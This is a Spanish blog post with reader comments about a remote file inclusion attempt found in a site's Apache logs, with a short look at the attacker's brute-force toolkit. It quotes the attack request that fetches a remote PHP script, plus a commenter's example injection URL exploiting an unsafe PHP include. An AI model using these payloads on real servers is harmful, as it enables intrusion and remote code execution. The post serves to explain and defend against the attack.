Febrero
2008
A las barricadas, ¡nos intentan hackear!
No es ningún secreto, cada segundo se intentan hackear o infectar millones de ordenadores en todo el mundo, pero cuando te pasa a tí no sabes muy bien lo que hacer.
Resulta que revisando por encima los logs de apache de www.tcosproject.org me encuentro con algo como esto:
GET /index.php?abs_path=http://heidik.org/canar/cmdaff? 404
El error es porque index.php no existe, pero es muy curioso como se puede intentar entrar en un servidor ajeno descargado unas cuantas herramientas:
cmdaff es un script PHP que intenta descargar y ejecutar algo (no se muy bien que es $cfe)
x-force.zip contiene un directorio oculto .x-force con algunas cosas curiosas:
mario@thinkpad:/tmp/.x-force$ ls -lh total 3,8M -rw-rw-rw- 1 mario mario 228 may 18 2005 auto -rw-rw-rw- 1 mario mario 3,8M oct 14 23:40 data.conf -rw-rw-rw- 1 mario mario 16K oct 13 2005 find -rw-rw-rw- 1 mario mario 786 mar 29 2007 xforce
mario@thinkpad:/tmp/.x-force$ file * auto: POSIX shell script text executable data.conf: ISO-8859 C program text, with CRLF line terminators find: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, dynamically linked (uses shared libs), not stripped xforce: Bourne-Again shell script text executable
data.conf es un diccionario con más de 250.000 parejas usuario:contraseña (se supone que para hacer ataques por fuerza bruta)
xforce es un script que primero lanza un escaneo (usando el binario find) y luego ataca pero no encuentro el binario atack por lo que no se muy bien como funciona, la web de este fulano está en portugues/brasileño pero hay algunos comentarios en español !!!.
find está compilado en una slakware con gcc 3.3.4 y mirando las cadenas con strings hay mezcla de inglés y algo que me suenta a francés o catalán:
[+] Find ip a terminat in %u de secunde. [Am gasit %d ip`uri]
Hay más scripts en perl, la mayoría boots o servidores IRC.
En fin no tengo más tiempo para cacharrear, aquí teneis las utilidades-varias del fulano para que os divirtais un poco.
Han intentado hacerte un roto con un fallo de programación que hace no mucho tenían muchos scripts estilo phpBB, el cms Serendipiti (o como se escriba), y seguro qeu alguno más.
Yo descubrí en su día que mucha gente caia en esta trampa, sino mira: http://google.com/codesearch?hl=es&lr=&q=lang%3Aphp+include+_GET&btnG=Buscar
El problema viene cuando intentas hacer un include/require (hablando de php) indicando el archivo por medio de la url (o variables de un POST). En esa búsqueda mismamente ya veo que hay uno que lo hace :D
include($PHPCMS_INCLUDEPATH.'/language.'.$_GET[language]);
Si le indicas a ese archivo una url con un query string del estilo... ?language=es%0http://lala.com/script.txt, si no han cambiado Apache, se lo tragará, y cargará el script.txt remoto :)
En fin, que me alegro que no os la colasen ^^
es un sencillo ataque con snifer apra rescate de password por fuerza bruta, pero usando palabras en base al diccionario y al usuario(nombre/escritorio)
lo del include, es un hyo comun de seguridad de php que esta claramente advertido en la web de php, y una posible solucion a ello tal como lo recomiendan es correr cada script de php en modulo de apache, pero en su propio espacio de memoria usando cgi. Es algo engorroso conbinar cgi + modulo y ni lo entiendo.
total, revisa el cron de la carpeta var, a ver que puso para replicarse...
en mi woody, pusieron uno de la misma manera, pero hasta hoy no llego muy lejos, como detalle interesante debo mencionar dos cosas:
find se encarga de hacer el ataque de fuerza bruta, y de paso lo manda a una lista de receptores, donde el atacante tranquilamente recibe para despues ingresar (lo que hizo en el mio infructuosamente), ademas de arrancarse en el cron.
en woody, la conf de password por defecto, obvia el 6to caracter en adelante, menos mal el password de mi woody de root era de 18 caracteres, y creo aun no lo ha encontrado...